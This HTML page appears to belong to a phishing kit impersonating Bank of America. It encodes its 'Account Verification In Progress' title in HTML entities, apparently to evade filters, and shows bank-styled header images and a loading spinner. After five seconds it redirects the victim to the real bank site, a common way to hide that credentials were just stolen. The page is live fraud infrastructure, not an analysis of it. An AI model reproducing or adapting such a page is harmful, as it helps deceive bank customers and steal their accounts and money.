<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>

<html><head>
<title>&#66;&#97;&#110;&#107;&#32;&#79;&#102;&#32;&#65;&#109;&#101;&#114;&#105;&#99;&#97;&#32;&#45;&#32;&#65;&#99;&#99;&#111;&#117;&#110;&#116;&#32;&#86;&#101;&#114;&#105;&#102;&#105;&#99;&#97;&#116;&#105;&#111;&#110;&#32;&#73;&#110;&#32;&#80;&#114;&#111;&#103;&#114;&#101;&#115;&#115;</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"x
              href="images/favicon.ico"/>	
			  <html><meta http-equiv="Refresh" content="5; https://www.bankofamerica.com/"></html>
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 1352px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body style="visibility:hidden" onload="unhideBody()">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1346px; height:146px; z-index:0"><img src="images/chead.png" alt="" title="" border=0 width=1346 height=146></div>


<div id="image9" style="position:absolute; overflow:hidden; left:170px; top:580px; width:981px; height:105px; z-index:3"><img src="images/kkk.png" alt="" title="" border=0 width=981 height=105></div>


<div id="image5" style="position:absolute; overflow:hidden; left:462px; top:201px; width:431px; height:21px; z-index:10"><img src="images/ae24.png" alt="" title="" border=0 width=431 height=21></div>

<div id="image6" style="position:absolute; overflow:hidden; left:599px; top:316px; width:128px; height:128px; z-index:11"><img src="images/loading.gif" alt="" title="" border=0 width=128 height=128></div>

</div>

</body>
</html>
